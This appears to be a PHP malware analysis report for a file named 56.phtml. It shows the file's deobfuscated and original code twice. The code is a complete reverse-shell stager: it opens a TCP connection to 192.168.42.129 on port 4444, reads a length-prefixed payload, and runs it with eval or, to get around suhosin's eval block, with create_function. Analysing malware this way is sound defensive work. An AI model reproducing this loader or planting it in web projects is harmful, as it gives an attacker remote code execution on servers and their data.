56.phtml

md5: 685e26da0bcc33d884082425f11c97a9

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
No Image
Attributes
Environment
error_reporting (Deobfuscated, Original)

Execution
create_function (Deobfuscated, Original)
eval (Deobfuscated, Original)

Deobfuscated PHP code
/*<?php 
/**/
error_reporting(0);
$ip = '192.168.42.129';
$port = 4444;
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = stream_socket_client("tcp://192.168.42.129:4444");
    $s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
    $s = fsockopen($ip, $port);
    $s_type = 'stream';
}
if (!$s && ($f = 'socket_create') && is_callable($f)) {
    $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) {
        die;
    }
    $s_type = 'socket';
}
if (!$s_type) {
    die('no socket funcs');
}
if (!$s) {
    die('no socket');
}
switch ($s_type) {
    case 'stream':
        $len = fread($s, 4);
        break;
    case 'socket':
        $len = socket_read($s, 4);
        break;
}
if (!$len) {
    die;
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream':
            $b .= fread($s, $len - strlen($b));
            break;
        case 'socket':
            $b .= socket_read($s, $len - strlen($b));
            break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
    $suhosin_bypass = create_function('', $b);
    $suhosin_bypass();
} else {
    eval($b);
}
die;
Execution traces
Generated HTML code
Original PHP code
/*<?php /**/ error_reporting(0); $ip = '192.168.42.129'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

PHP Malware Analysis

56.phtml

md5: 685e26da0bcc33d884082425f11c97a9

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code